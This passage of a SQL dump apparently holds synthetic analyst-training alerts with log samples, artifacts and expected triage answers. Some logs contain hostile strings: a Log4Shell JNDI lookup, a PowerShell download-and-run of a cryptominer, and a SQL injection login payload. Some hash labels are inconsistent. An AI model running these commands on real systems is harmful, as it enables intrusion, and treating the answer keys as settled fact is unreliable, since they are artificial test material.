window.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"Backup Integrity Check\",\"verdict\":\"clean\",\"details\":\"Original hash of the backup file before modification.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"is_critical\":true,\"osint_result\":{\"source\":\"Backup Integrity Check\",\"verdict\":\"malicious\",\"details\":\"Modified hash indicating tampering with the backup file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(586, 'Initial Access: JNDI Injection Detected', 'critical', 'Web Application Firewall Logs', 'Anomalous traffic patterns have been identified which indicate a JNDI injection attempt targeting a critical Java-based application. The attempt is likely leveraging the Log4Shell vulnerability for initial access.', 'Exploit', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.75\",\"request_uri\":\"/vulnerable-endpoint\",\"http_method\":\"GET\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"referrer\":\"http://example.com/malicious-page\",\"jndi_string\":\"ldap://203.0.113.45:1389/Exploit\",\"malicious_indicator\":\"exploit.jar\",\"transaction_id\":\"abc123def456ghi789\",\"status_code\":200}', '2026-01-08 22:09:09', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exploitation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical Java-based application server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit.jar\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Log4Shell exploitation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(587, 'Execution: Cryptominer Deployment Identified', 'high', 'Endpoint Detection and Response (EDR) Logs', 'The EDR system identified the execution of a known cryptomining payload. The attacker utilized their access to deploy the cryptominer \'xmrig.exe\' on the target system, exploiting system resources for illicit mining activities. The activity was flagged due to anomalous process creation and outbound connections to a known mining pool.', 'Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:52:45Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -Command \\\"Invoke-WebRequest -Uri http://maliciousdomain.com/malware/xmrig.exe -OutFile C:\\\\Users\\\\Public\\\\xmrig.exe; Start-Process C:\\\\Users\\\\Public\\\\xmrig.exe\\\"\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"username\":\"compromised_user\",\"file_name\":\"xmrig.exe\",\"external_ip\":\"198.51.100.23\"}', '2026-01-08 22:09:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known cryptomining pool IP.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a cryptominer executable.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"xmrig.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Commonly used name for cryptomining software.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account showing anomalous behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(588, 'Persistence: Backdoor Creation Alert', 'high', 'System Event Logs', 'To ensure continued access, a sophisticated backdoor is deployed, blending into normal traffic and evading basic security measures.', 'Backdoor', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T15:23:43Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"filename\":\"svchost.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_description\":\"New service installed for persistence.\",\"service_name\":\"WinSvcHelper\",\"service_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"}', '2026-01-08 22:09:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account used in suspicious logon activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Malicious file mimicking a legitimate Windows process.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(589, 'Lateral Movement: Unauthorized Access Detected', 'high', 'Network Traffic Analysis', 'Attackers are attempting to expand their foothold by moving laterally within the network, targeting sensitive data stores and critical systems. Unauthorized access was detected from an external IP to multiple internal systems.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:12:34Z\",\"event_id\":\"LM-20231005-001\",\"source_ip\":\"203.0.113.45\",\"destination_ips\":[\"10.0.5.25\",\"192.168.1.14\"],\"username\":\"jdoe_admin\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_action\":\"User jdoe_admin accessed multiple systems within a short time frame\",\"file_accessed\":\"confidential_financial_data.xlsx\",\"alert\":\"Suspicious lateral movement detected from external IP 203.0.113.45 using compromised credentials.\"}', '2026-01-08 22:09:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Local network IP, no suspicious activity recorded.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Local network IP, no suspicious activity recorded.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in abnormal access patterns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for credential theft.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL),
(590, 'Exfiltration: Data Transfer Anomaly', 'critical', 'Data Loss Prevention (DLP) Systems', 'Anomalous data transfer activities are detected, indicating potential exfiltration of sensitive information to external servers controlled by the attackers. The data transfer volume and destination IPs suggest a sophisticated exfiltration attempt.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"DLP-20231015142345-001\",\"source_ip\":\"10.0.0.5\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"financial_report_q3_2023.xlsx\",\"hash\":\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\",\"data_volume\":\"2GB\",\"protocol\":\"HTTPS\",\"action_taken\":\"Alerted\",\"description\":\"Detected large data transfer to external IP not whitelisted.\"}', '2026-01-08 22:09:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration endpoint associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Employee: John Doe, Sales Department.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial information.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hashing Database\",\"verdict\":\"suspicious\",\"details\":\"File hash not recognized in the internal database.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(591, 'Initial Access via SQL Injection', 'high', 'Web application firewall logs', 'Cl0p identifies and exploits an SQL injection vulnerability in the MOVEit platform, allowing unauthorized access to sensitive databases.', 'Exploitation of Vulnerability', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"WAF123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"method\":\"GET\",\"url\":\"https://moveit.example.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"request_payload\":\"username=admin\' OR 1=1-- &password=dummy\",\"response_code\":200,\"signature_id\":\"SQLi-2023-001\",\"description\":\"SQL Injection attempt detected\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous SQL injection attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal MOVEit server.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://moveit.example.com/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Web Application\",\"verdict\":\"clean\",\"details\":\"Legitimate web application URL.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(592, 'Automated Execution of Data Harvesting Scripts', 'high', 'Endpoint detection and response (EDR) tools', 'Following initial access, Cl0p group deployed automated JavaScript scripts on the compromised MOVEit infrastructure to systematically extract large volumes of sensitive data.', 'T1059.007: Command and Scripting Interpreter: JavaScript', 'T1059.007', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"compromised-host\",\"detected_script\":\"/var/tmp/data_harvest.js\",\"hash\":\"ec2f4a6b3e8fbc4a9d1f2c3d4e5f6a7b8c9d0e1f\",\"attacker_ip\":\"203.0.113.66\",\"user\":\"john_doe\",\"process_id\":4567,\"command_line\":\"node /var/tmp/data_harvest.js\",\"execution_time\":\"2023-10-05T14:23:30Z\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ec2f4a6b3e8fbc4a9d1f2c3d4e5f6a7b8c9d0e1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Cl0p activities\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account used in suspicious script execution\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/var/tmp/data_harvest.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as part of data exfiltration operation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(593, 'Establishing Persistence within Networks', 'high', 'System startup and logon logs', 'Cl0p group has established persistence by modifying the system logon scripts to execute malicious binaries during system startup. This action ensures continued access for prolonged data theft.', 'T1547: Boot or Logon Autostart Execution', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:23Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host\",\"logon_type\":\"2\",\"source_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"logon_process\":\"User32\",\"file_path\":\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"User logon with modified startup script executing malware.\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligenceDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File recognized as a Cl0p group persistence mechanism.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account compromised by adversary.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(594, 'Lateral Movement to Enhance Data Access', 'high', 'Network traffic analysis', 'Suspicious lateral movement detected within the organization network indicating potential attempt to enhance data access by hiding indicators on host systems.', 'T1070: Indicator Removal on Host', 'T1070', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:18Z\",\"event_id\":\"4634\",\"source_ip\":\"203.0.113.56\",\"destination_ip\":\"192.168.1.45\",\"destination_host\":\"file-server-02\",\"malware_hash\":\"3f4d5c6e7b8e9f0a123456789abcdef0\",\"user\":\"admin_user\",\"filename\":\"cl0p_removal_tool.exe\",\"action\":\"Indicator removal\",\"log_message\":\"Possible use of Cl0p malware detected. Unusual indicator removal activity from 203.0.113.56 targeting 192.168.1.45 by user admin_user using cl0p_removal_tool.exe.\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Cl0p APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset\",\"verdict\":\"internal\",\"details\":\"Internal file server targeted by the threat.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f4d5c6e7b8e9f0a123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cl0p_removal_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Cl0p malware activities.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(595, 'Mass Exfiltration and Unique Extortion', 'high', 'Outbound network traffic logs', 'In the final act, Cl0p exfiltrates data to external servers and initiates a unique extortion campaign, threatening public release rather than deploying ransomware. The operation involved transferring large volumes of data to a known malicious IP associated with Cl0p\'s command and control infrastructure.', 'T1041: Exfiltration Over C2 Channel', 'Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:17Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"185.225.19.78\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"bytes_out\":987654321,\"username\":\"jdoe\",\"filename\":\"financial_data_backup.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"ALLOW\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.225.19.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Cl0p C2 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_data_backup.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"File matches internal naming conventions for sensitive data backups.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(596, 'Suspicious Access to Exchange Server', 'high', 'Exchange Server logs', 'Initial access attempt detected on the Exchange server via CVE-2021-34473 exploitation. An unauthorized request was made from a suspicious external IP address, potentially setting the stage for further attacks.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:03:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.10.5\",\"destination_port\":\"443\",\"username\":\"unauthorized_user\",\"action\":\"login_attempt\",\"status\":\"failed\",\"exploit\":\"CVE-2021-34473\",\"file_accessed\":\"/owa/auth.owa\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT groups targeting Exchange servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Exchange Server\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in the directory.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/owa/auth.owa\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Logs\",\"verdict\":\"suspicious\",\"details\":\"File frequently targeted in Exchange exploits.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(597, 'Web Shell Deployment Detected', 'high', 'Web server logs', 'A web shell has been deployed on the server, allowing remote execution of commands by attackers. This indicates a severe security breach that needs immediate attention.', 'Execution', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"method\":\"POST\",\"url\":\"/uploads/webshell.php\",\"http_status\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uploaded_file\":{\"filename\":\"webshell.php\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"username\":\"admin_user\",\"session_id\":\"abcd1234efgh5678ijkl\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"webshell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Incident Response Team\",\"verdict\":\"malicious\",\"details\":\"File identified as web shell\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with known web shells\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Admin account used for unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(598, 'Privilege Escalation via CVE-2021-34523', 'high', 'Event logs and security logs', 'An attacker exploited CVE-2021-34523 to escalate privileges on the server, potentially allowing persistent access. The attacker used a crafted exploit to gain elevated privileges, moving from a standard user account to an administrative account. This action solidifies their foothold within the network, facilitating further malicious activities.', 'Persistence', 'T1068: Exploitation for Privilege Escalation', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":4624,\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"event_type\":\"Logon\",\"user\":{\"target_user\":\"admin_user\",\"target_domain\":\"CORP\",\"target_logon_id\":\"0x3e7\"},\"logon_type\":2,\"logon_process\":\"User32 \",\"authentication_package\":\"Negotiate\",\"source_ip\":\"203.0.113.45\",\"source_port\":60000,\"target_ip\":\"10.0.0.25\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"vulnerability_exploited\":\"CVE-2021-34523\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"suspicious\",\"details\":\"Hash observed in suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Legitimate administrative user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 